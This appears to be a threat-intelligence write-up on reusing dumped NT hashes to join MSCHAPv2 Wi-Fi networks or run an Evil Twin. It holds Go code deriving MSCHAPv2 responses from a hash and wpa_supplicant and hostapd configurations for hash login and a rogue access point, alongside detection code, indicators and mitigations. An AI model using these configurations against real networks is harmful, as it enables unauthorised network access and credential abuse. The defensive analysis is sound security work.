Full Report
Thanks to a tweet Dominic responded to, I saw someone mention Passing-the-hash when I think they actually meant relay. The terminology can be confusing for sure; however, it made me realise that I had never Passed-the-hash with a Wi-Fi network. So, having learnt my lesson from previous projects, I first made sure this was possible for NT -> MSCHAP by looking at the RFC.

```
8.1. GenerateNTResponse()

   GenerateNTResponse(
   IN  16-octet              AuthenticatorChallenge,
   IN  16-octet              PeerChallenge,
   IN  0-to-256-char         UserName,
   IN  0-to-256-unicode-char Password,
   OUT 24-octet              Response )
   {
      8-octet  Challenge
      16-octet PasswordHash

      ChallengeHash( PeerChallenge, AuthenticatorChallenge, UserName,
                     giving Challenge)

      NtPasswordHash( Password, giving PasswordHash )
      ChallengeResponse( Challenge, PasswordHash, giving Response )
   }
```

Looks like you can! As you can see in the above, the ChallengeResponse is created using the NT hash and not the password. I then checked wpa_supplicant to see whether this was already a feature, and it turns out it is! Looking at the wpa_supplicant configuration file, it says:
Analysis Summary
# Tool/Technique: Passing-the-Hash over Wi-Fi (MSCHAP)
## Overview
This summary details the technique of reusing an already-compromised NT hash to authenticate to Wi-Fi networks that run MSCHAPv2 inside an EAP tunnel (PEAP or TTLS), without ever knowing the plaintext password. MSCHAPv2 only ever uses the NT hash (the LM hash plays no part, unlike in MS-CHAPv1). The technique applies on both the supplicant (client) side and the authenticator (RADIUS/EAP server, or an Evil Twin AP that embeds one) side, because every secret-dependent step in RFC 2759 (Microsoft PPP CHAP Extensions, Version 2) takes the NT hash, not the password, as input.
## Technical Details
- Type: Technique
- Platform: Client operating systems supporting `wpa_supplicant` (Linux/Unix-like), Access Points using compatible EAP frameworks (e.g., hostapd).
- Capabilities: Authenticating to MSCHAPv2-protected EAP wireless networks using the target's NT hash instead of the plaintext password, provided the configuration allows hash input.
- First Seen: The article describes leveraging existing functionality discovered around October 2020.
## MITRE ATT&CK Mapping
The direct mapping is pass-the-hash; the surrounding steps map to credential dumping and, for the rogue-AP case, adversary-in-the-middle.
- **T1550.002 - Use Alternate Authentication Material: Pass the Hash** (the NT hash is reused as the credential in the MSCHAPv2 exchange)
- **T1003.001 - OS Credential Dumping: LSASS Memory** and **T1003.003 - OS Credential Dumping: NTDS** (where the user or machine NT hash comes from)
- **T1110.002 - Brute Force: Password Cracking** (the step this technique makes unnecessary: a captured MSCHAPv2 challenge/response no longer has to be cracked when the hash is already known)
- **T1078.002 - Valid Accounts: Domain Accounts** (the authentication succeeds as a legitimate domain user or machine account)
For the Evil Twin scenario where the attacker acts as the AP:
- **T1557 - Adversary-in-the-Middle**, specifically **T1557.004 - Adversary-in-the-Middle: Evil Twin** (ATT&CK v15 and later)
## Functionality
### Core Capabilities
1. **Client Authentication using Hash:** A supplicant can be configured in `wpa_supplicant` with `password=hash:<32 hex digits>` (the 16-byte NtPasswordHash) in place of the plaintext password for EAP methods whose inner authentication is MSCHAPv2 or MSCHAP (EAP-MSCHAPv2, PEAP/MSCHAPv2, TTLS/MSCHAPv2, TTLS/MSCHAP, LEAP). This works because `GenerateNTResponse()` in RFC 2759 section 8.1 only ever calls `NtPasswordHash(Password)` to obtain the hash and then feeds that hash to `ChallengeResponse()`; supplying the hash directly skips the one step that needs the password.
2. **Authenticator Impersonation using Hash:** An EAP server such as `hostapd` (which accepts `hash:<32 hex digits>` in its `eap_user` file) needs the NT hash for two things: to recompute and verify the peer's NT-Response, and to produce `GenerateAuthenticatorResponse()` (RFC 2759 section 8.7), whose secret input is `HashNtPasswordHash`, i.e. MD4 of the NT hash. Neither step needs the plaintext password, so an attacker holding only the hash can both accept the victim's login and pass the victim's mutual-authentication check.
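To make both capabilities concrete, here is the RFC 2759 section 8 arithmetic written out end to end. This is an added example, not code from the original post, wpa_supplicant or hostapd; it uses only the Go standard library (MD4 is implemented inline because Go does not ship it). The challenge values and user name in `main` are the ones from the RFC 2759 section 9 example; the NT hash is derived from the RFC's password only so the demo is self-contained, whereas an attacker would have it from a credential dump.

```go
// Added example, not code from the original post, wpa_supplicant or hostapd: the
// RFC 2759 section 8 MS-CHAPv2 computations, showing that the peer's NT-Response
// (8.1) and the authenticator's response (8.7) both derive from the 16-byte NT
// hash, never from the password. Go standard library only; MD4 is inlined.
package main

import (
	"crypto/des"
	"crypto/sha1"
	"encoding/binary"
	"fmt"
	"unicode/utf16"
)

// md4 is RFC 1320 MD4, used by NtPasswordHash (8.3) and HashNtPasswordHash (8.4).
func md4(data []byte) (out [16]byte) {
	msg := append(append([]byte{}, data...), 0x80)
	msg = append(msg, make([]byte, (120-len(msg)%64)%64)...) // zero-pad to 56 mod 64
	for i := 0; i < 8; i++ { // 64-bit little-endian bit length
		msg = append(msg, byte(uint64(len(data))*8>>(8*uint(i))))
	}
	a, b, c, d := uint32(0x67452301), uint32(0xefcdab89), uint32(0x98badcfe), uint32(0x10325476)
	rot := func(x uint32, s uint) uint32 { return x<<s | x>>(32-s) }
	for off := 0; off < len(msg); off += 64 {
		var x [16]uint32
		for i := range x {
			x[i] = binary.LittleEndian.Uint32(msg[off+4*i:])
		}
		aa, bb, cc, dd := a, b, c, d
		for i := 0; i < 16; i++ { // round 1 (F), message words in order
			a = rot(a+((b&c)|(^b&d))+x[i], []uint{3, 7, 11, 19}[i%4])
			a, b, c, d = d, a, b, c
		}
		for i := 0; i < 16; i++ { // round 2 (G), words 0,4,8,12,1,5,...
			a = rot(a+((b&c)|(b&d)|(c&d))+x[(i%4)*4+i/4]+0x5a827999, []uint{3, 5, 9, 13}[i%4])
			a, b, c, d = d, a, b, c
		}
		for i := 0; i < 16; i++ { // round 3 (H), words in bit-reversed order
			a = rot(a+(b^c^d)+x[(i&1)<<3|(i&2)<<1|(i&4)>>1|(i&8)>>3]+0x6ed9eba1, []uint{3, 9, 11, 15}[i%4])
			a, b, c, d = d, a, b, c
		}
		a, b, c, d = a+aa, b+bb, c+cc, d+dd
	}
	for i, v := range []uint32{a, b, c, d} {
		binary.LittleEndian.PutUint32(out[4*i:], v)
	}
	return
}

// NtPasswordHash (8.3): MD4 of the UTF-16LE password; the value in credential dumps.
func ntPasswordHash(password string) [16]byte {
	u := utf16.Encode([]rune(password))
	buf := make([]byte, 2*len(u))
	for i, v := range u {
		binary.LittleEndian.PutUint16(buf[2*i:], v)
	}
	return md4(buf)
}

// ChallengeHash (8.2): SHA1(PeerChallenge|AuthenticatorChallenge|UserName)[:8]; UserName has no DOMAIN\ prefix.
func challengeHash(peer, auth [16]byte, userName string) (out [8]byte) {
	sum := sha1.Sum(append(append(peer[:], auth[:]...), userName...))
	copy(out[:], sum[:])
	return
}

// ChallengeResponse (8.5): three DES encryptions of the challenge under the zero-padded 21-byte hash.
func challengeResponse(challenge [8]byte, pwHash [16]byte) (resp [24]byte) {
	z := append(pwHash[:], 0, 0, 0, 0, 0)
	for i := 0; i < 3; i++ {
		key := [8]byte{z[7*i], 0, 0, 0, 0, 0, 0, z[7*i+6] << 1} // DesEncrypt (8.6): 7-byte key -> 8 bytes
		for j := 1; j < 7; j++ { // the inserted low bit of each byte is parity, which DES ignores
			key[j] = z[7*i+j-1]<<(8-uint(j)) | z[7*i+j]>>uint(j)
		}
		block, _ := des.NewCipher(key[:]) // 8-byte key: cannot fail
		block.Encrypt(resp[8*i:8*i+8], challenge[:])
	}
	return
}

// GenerateNTResponse (8.1) with NtPasswordHash supplied directly: no password on this path.
func ntResponseFromHash(auth, peer [16]byte, userName string, ntHash [16]byte) [24]byte {
	return challengeResponse(challengeHash(peer, auth, userName), ntHash)
}

// GenerateAuthenticatorResponse (8.7): the server's proof; its secret input is MD4(NT hash) only.
func authenticatorResponse(auth, peer [16]byte, userName string, ntHash [16]byte, ntResp [24]byte) string {
	hh := md4(ntHash[:]) // HashNtPasswordHash (8.4)
	digest := sha1.Sum(append(append(hh[:], ntResp[:]...), "Magic server to client signing constant"...))
	ch := challengeHash(peer, auth, userName)
	final := sha1.Sum(append(append(digest[:], ch[:]...), "Pad to make it do more than one iteration"...))
	return fmt.Sprintf("S=%X", final)
}

func main() {
	// Constructed input: challenges and user name from the RFC 2759 section 9 example.
	auth := [16]byte{0x5B, 0x5D, 0x7C, 0x7D, 0x7B, 0x3F, 0x2F, 0x3E, 0x3C, 0x2C, 0x60, 0x21, 0x32, 0x26, 0x26, 0x28}
	peer := [16]byte{0x21, 0x40, 0x23, 0x24, 0x25, 0x5E, 0x26, 0x2A, 0x28, 0x29, 0x5F, 0x2B, 0x3A, 0x33, 0x7C, 0x7E}
	ntHash := ntPasswordHash("clientPass") // stands in for a dumped hash so the demo is self-contained
	resp := ntResponseFromHash(auth, peer, "User", ntHash)
	fmt.Printf("NtPasswordHash: %x\nNT-Response:    %X\n", ntHash, resp)
	fmt.Println("Authenticator:  " + authenticatorResponse(auth, peer, "User", ntHash, resp))
}
```

`ntResponseFromHash` is the path `password=hash:` takes in a supplicant: the 24-byte NT-Response is built from the hash and the two challenges alone. `authenticatorResponse` is the other half: the server needs `MD4(NT hash)` and the NT-Response, so an Evil Twin holding the hash can satisfy the client's mutual-authentication check as well. A quick sanity check on the hashing is that `ntPasswordHash("password")` yields the familiar `8846f7eaee8fb117ad06bdd830b7586c`.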
### Advanced Features
* **Machine Account Exploitation:** The technique is noted as particularly useful when machine accounts authenticate to Wi-Fi. A machine account password is long, random and rotated automatically (every 30 days by default), so cracking a captured MSCHAPv2 exchange for it is hopeless; its NT hash, however, can be dumped from the domain-joined host (it is stored in the LSA secret `$MACHINE.ACC`) and reused directly for network access.
* **Evil Twin Setup:** An attacker can set up a malicious AP (Evil Twin) whose EAP server is loaded with known NT hashes. A rogue AP without the hash can only harvest the victim's challenge/response for offline cracking and cannot complete the exchange; with the hash it can verify the NT-Response, produce the authenticator response that satisfies the client's check, and derive the session keys (RFC 3079 also builds them from MD4 of the NT hash), so the victim fully associates. This requires the client to accept the rogue server in the first place, either because it does not validate the server certificate or through a client-side validation bug such as CVE-2019-6203 mentioned in the text.
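The two sides of the technique in the actual configuration syntax. This is an added example, not configuration from the original post: SSID, identities, CA path and server names are placeholders, and the hash shown is the NT hash of the string `password`, substituted for a dumped one. The `hostapd.conf` that loads the second file additionally needs `eap_server=1`, `eap_user_file=`, and a server certificate (`server_cert`, `private_key`).

```conf
# --- wpa_supplicant.conf (client side): log in with a dumped NT hash ---
network={
    ssid="CorpWiFi"
    key_mgmt=WPA-EAP
    eap=PEAP
    anonymous_identity="anonymous@corp.example"
    identity="alice@corp.example"
    # NtPasswordHash in hash:<32 hex digits> form instead of the plaintext
    # password; only valid for MSCHAPv2/MSCHAP inner methods.
    password=hash:8846f7eaee8fb117ad06bdd830b7586c
    phase2="auth=MSCHAPV2"
    # Keep these even when attacking: they make the test realistic, and a
    # supplicant that omits them is exactly what the Evil Twin below relies on.
    ca_cert="/etc/ssl/certs/corp-ca.pem"
    domain_suffix_match="radius.corp.example"
}

# --- hostapd.eap_user (Evil Twin side): answer for a user whose hash is known ---
# Phase 1: offer PEAP to everyone. Phase 2 ([2]) entries carry the inner
# credential; hostapd accepts the NT hash here just as wpa_supplicant does.
*          PEAP
"alice"    MSCHAPV2   hash:8846f7eaee8fb117ad06bdd830b7586c   [2]
```

With the hash in the phase 2 entry the rogue EAP server can both verify alice's NT-Response and send back a correct authenticator response; without it, it could only log the challenge/response pair for cracking.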
## Indicators of Compromise
This technique primarily relies on compromised credentials (hashes) rather than specific malware files.
- File Hashes: N/A (Relies on pre-existing hashes, e.g., from tools like Mimikatz).
- File Names: `wpa_supplicant.conf`, `hostapd.conf`.
- Registry Keys: N/A
- Network Indicators: On the wire the exchange is indistinguishable from a normal login: the NT-Response is computed from the NT hash whether the client was given the password or the hash, so there is no packet-level artefact of hash use. Look instead for rogue SSIDs imitating the corporate network (Evil Twin), and in RADIUS accounting for an account authenticating from an unexpected Calling-Station-Id (client MAC), from several MACs in quick succession, or for a machine account's credential arriving from hardware that is not that machine.
- Behavioral Indicators: `password=hash:<32 hex digits>` in a `wpa_supplicant` profile or `hash:<32 hex digits>` in a `hostapd` `eap_user` file on a Linux host; machine-account (`host/...`) logins whose client MAC does not match the asset inventory.
## Associated Threat Actors
This technique is commonly associated with penetration testers and with advanced threat actors who move laterally on the back of credential harvesting (for example, actors using post-exploitation frameworks that retrieve hashes from memory). Threat actors already employ the same hash reuse against SMB/WinRM (Passing-the-Hash), making Wi-Fi access a logical extension.
## Detection Methods
- Signature-based detection: Detecting configuration files (`wpa_supplicant.conf` or `hostapd.conf`/`hostapd.eap_user`) containing the `hash:` prefix followed by a 32-character hexadecimal string in authentication fields. This is host-based and only finds attacker-controlled Linux hosts.
- Behavioral detection: The MSCHAPv2 exchange itself carries no trace of whether the hash or the password was used, so RADIUS/EAP server logs cannot reveal hash usage directly. Detect the consequences instead: the same account succeeding from more than one Calling-Station-Id (client MAC) in a short window, a machine account (`host/...`) appearing from a MAC other than that machine's, client MACs with OUIs typical of attack adapters, and logins via an unexpected NAS or location.
- YARA rules: Could be written to search configuration files for the specific syntax patterns noted.
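The behavioural rule above, run over a handful of RADIUS authentication log lines. This is an added example, not tooling from the original post: the log layout follows FreeRADIUS "Login OK" lines (user name in brackets, `cli` carrying the Calling-Station-Id) and the sample lines, access-point names and MACs are constructed for the demo.

```go
// Added example, not from the original post: behavioural detection of Wi-Fi
// pass-the-hash over RADIUS "Login OK" lines. The wire exchange is identical to a
// normal login, so the signal is which device an account authenticates from.
// The log format and sample lines are constructed in FreeRADIUS style.
package main

import (
	"fmt"
	"regexp"
	"sort"
	"strings"
	"time"
)

type authEvent struct {
	When time.Time
	User string // EAP identity, e.g. "alice" or "host/laptop01.corp.example"
	NAS  string // the AP / RADIUS client that forwarded the request
	MAC  string // Calling-Station-Id: the supplicant's Wi-Fi MAC
}

// loginOK matches lines such as
// Mon Oct 12 09:14:03 2020 : Auth: (41) Login OK: [alice] (from client ap-floor2 port 0 cli 3C-22-FB-12-34-56 via TLS tunnel)
var loginOK = regexp.MustCompile(`^(\w{3} \w{3} +\d+ \d\d:\d\d:\d\d \d{4}) : Auth: \(\d+\) Login OK: \[([^\]]+)\] \(from client (\S+) port \d+ cli ([0-9A-Fa-f:-]{17})`)

func parseLine(line string) (authEvent, bool) {
	m := loginOK.FindStringSubmatch(line)
	if m == nil {
		return authEvent{}, false
	}
	t, err := time.Parse("Mon Jan _2 15:04:05 2006", m[1])
	if err != nil {
		return authEvent{}, false
	}
	mac := strings.ToUpper(strings.ReplaceAll(m[4], ":", "-")) // normalise aa:bb:.. and AA-BB-..
	return authEvent{When: t, User: m[2], NAS: m[3], MAC: mac}, true
}

// isMachineAccount: Windows machine authentication presents host/<fqdn> (or NAME$).
func isMachineAccount(user string) bool {
	return strings.HasPrefix(strings.ToLower(user), "host/") || strings.HasSuffix(user, "$")
}

// detectHashReuse returns one alert per login where an account appears from a
// different client MAC than at its previous login: always for machine accounts
// (their credential belongs to exactly one device), and for user accounts only
// when the two logins are closer together than window (one person, two devices).
func detectHashReuse(lines []string, window time.Duration) []string {
	var evs []authEvent
	for _, l := range lines {
		if e, ok := parseLine(l); ok {
			evs = append(evs, e)
		}
	}
	sort.SliceStable(evs, func(i, j int) bool { return evs[i].When.Before(evs[j].When) })
	last := map[string]authEvent{}
	var alerts []string
	for _, e := range evs {
		if prev, seen := last[e.User]; seen && prev.MAC != e.MAC {
			gap := e.When.Sub(prev.When)
			switch {
			case isMachineAccount(e.User):
				alerts = append(alerts, fmt.Sprintf("HIGH %s: machine account from %s via %s, previously %s (%s earlier)", e.User, e.MAC, e.NAS, prev.MAC, gap))
			case gap <= window:
				alerts = append(alerts, fmt.Sprintf("MEDIUM %s: second device %s via %s only %s after %s", e.User, e.MAC, e.NAS, gap, prev.MAC))
			}
		}
		last[e.User] = e
	}
	return alerts
}

// sampleLog is constructed: laptop01 and alice log in normally, then both appear
// from an ALFA-OUI (00-C0-CA) adapter in the lobby; bob changes device a day later.
var sampleLog = []string{
	"Mon Oct 12 09:14:03 2020 : Auth: (41) Login OK: [host/laptop01.corp.example] (from client ap-floor2 port 0 cli 3C-22-FB-12-34-56 via TLS tunnel)",
	"Mon Oct 12 09:15:10 2020 : Auth: (42) Login OK: [alice] (from client ap-floor2 port 0 cli 3C-22-FB-12-34-56 via TLS tunnel)",
	"Mon Oct 12 09:40:22 2020 : Auth: (57) Login OK: [host/laptop01.corp.example] (from client ap-lobby port 0 cli 00-C0-CA-AB-CD-EF via TLS tunnel)",
	"Mon Oct 12 09:41:05 2020 : Auth: (58) Login OK: [alice] (from client ap-lobby port 0 cli 00-C0-CA-AB-CD-EF via TLS tunnel)",
	"Mon Oct 12 17:02:44 2020 : Auth: (99) Login OK: [bob] (from client ap-floor3 port 0 cli 10-02-B5-77-88-99 via TLS tunnel)",
	"Tue Oct 13 08:01:00 2020 : Auth: (120) Login OK: [bob] (from client ap-floor3 port 0 cli DC-A6-32-11-22-33 via TLS tunnel)",
}

func main() {
	for _, a := range detectHashReuse(sampleLog, 30*time.Minute) {
		fmt.Println(a)
	}
}
```

On the sample, `laptop01` reappearing from the lobby adapter fires HIGH regardless of timing, `alice` fires MEDIUM because her second device shows up within the 30-minute window, and `bob` changing laptops the next day stays quiet. In production the same logic wants an asset inventory (machine account to expected MAC) rather than "first seen wins", and the Calling-Station-Id should be taken from RADIUS accounting rather than parsed out of text logs.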
## Mitigation Strategies
- **Disable MSCHAPv2/PEAP/TTLS for Wi-Fi:** Where possible, migrate to EAP-TLS, which authenticates both sides with certificates; there is no password or hash to steal and replay.
- **Certificate Pinning/Strict Validation:** Configure supplicants to validate the RADIUS server certificate against the corporate CA and to check the server name (for example `domain_suffix_match` in `wpa_supplicant`, or the trusted root and server-name settings in a Windows wireless profile), so an Evil Twin cannot complete the tunnel even when it holds the hash.
- **Credential Protection:** Make the hash harder to obtain in the first place: LSA Protection (`RunAsPPL`) and Credential Guard on Windows, and a short, enforced machine-account password rotation period, which at least limits how long a dumped machine hash stays valid.
- **Network Hardening:** Note that WPA2-Enterprise and WPA3-Enterprise carry the same EAP methods; moving to WPA3 on its own does not remove MSCHAPv2. WPA3-Enterprise 192-bit mode does, because it mandates EAP-TLS.
## Related Tools/Techniques
- **Passing-the-Hash (General):** Reusing an NT hash as the credential in NTLM authentication over SMB, WinRM and other Windows protocols; this page applies the same idea to MSCHAPv2.
- **Relaying/Relay Attacks:** Forwarding a live challenge/response exchange from a victim to a third-party service while it is in progress. No hash knowledge is needed, which is why relay and Passing-the-Hash are distinct even though they are often confused (the confusion that prompted the original post).
- **Spock’s Evil Twin:** Mentioned in the text as the type of malicious AP used in the second scenario.